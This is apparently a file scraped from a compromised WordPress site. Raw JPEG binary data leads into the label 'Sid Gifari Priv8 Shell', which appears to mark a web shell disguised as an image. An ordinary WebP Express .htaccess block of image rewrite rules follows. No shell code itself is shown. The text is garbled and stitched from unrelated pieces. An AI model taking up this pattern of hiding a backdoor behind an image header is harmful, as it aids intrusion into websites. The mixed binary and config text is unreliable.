���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��Sid Gifari Priv8 Shell # BEGIN WebP Express # The rules below have been dynamically created by WebP Express in accordance with the plugin settings # DO NOT EDIT MANUALLY (unless you are prepared that your changes might be overridden by WebP Express) # The following parameters have been in play to produce the rules: # # WebP Express options: # - Operation mode: varied-image-responses # - Redirection to existing webp: enabled # - Redirection to converter: enabled # - Redirection to converter to create missing webp files upon request for the webp: enabled # - Destination folder: separate # - Destination extension: append # - Destination structure: image-roots # - Image types: jpeg, png # - Alter HTML enabled?: yes # # Wordpress/Server configuration: # - Document root availablity: Available and its "realpath" is available too. Can be used for structuring cache dir. # # .htaccess capability test results: # - mod_header working?: yes # - pass variable from .htaccess to script through header working?: no # - pass variable from .htaccess to script through environment variable working?: yes # # Role of the dir that this .htaccess is located in: # - Is this .htaccess in a dir containing source images?: yes # - Is this .htaccess in a dir containing webp images?: no # Rules for handling requests for source images # --------------------------------------------- RewriteEngine On # Escape hatch #1: Adding ?dontreplace to an url can be used to bypass redirection RewriteCond %{QUERY_STRING} dontreplace$ RewriteCond %{REQUEST_FILENAME} -f RewriteRule . - [L] # Escape hatch #2: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".dontreplace" appended will bypass redirection RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$ RewriteCond %1%2\.dontreplace -f RewriteRule . - [L] # Deprecated escape hatch: Adding ?original to an url can be used to bypass redirection RewriteCond %{QUERY_STRING} original$ RewriteCond %{REQUEST_FILENAME} -f RewriteRule . - [L] # Deprecated escape hatch: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".do-not-convert" appended will bypass redirection RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$ RewriteCond %1%2\.do-not-convert -f RewriteRule . - [L] # Avoid redirecting to webp files that are bigger than the original RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} (?i)(/home/festcinebrasilia/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$ RewriteCond /home/festcinebrasilia/public_html/wp-content/webp-express/webp-images-bigger-than-source/uploads/%2%3.webp -f RewriteRule . - [L] # Redirect to existing converted image in cache-dir (if browser supports webp) RewriteCond %{HTTP_ACCEPT} image/webp RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} (?i)(/home/festcinebrasilia/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$ RewriteCond /home/festcinebrasilia/public_html/wp-content/webp-express/webp-images/uploads/%2%3.webp -f RewriteRule (?i)(.*)(\.jpe?g|\.png)$ /wp-content/webp-express/webp-images/uploads/%2%3\.webp [T=image/webp,E=EXISTING:1,E=ADDVARY:1,L] # Redirect images to webp-on-demand.php (if browser supports webp) RewriteCond %{HTTP_ACCEPT} image/webp RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$ RewriteRule (?i).*$ /wp-content/plugins/webp-express/wod/webp-on-demand.php [E=WE_WP_CONTENT_REL_TO_WE_PLUGIN_DIR:../../,E=WE_SOURCE_REL_HTACCESS:$0,E=WE_HTACCESS_ID:uploads,NC,L] # Make sure that browsers which does not support webp also gets the Vary:Accept header # when requesting images that would be redirected to webp on browsers that does. Header append "Vary" "Accept" # END WebP Express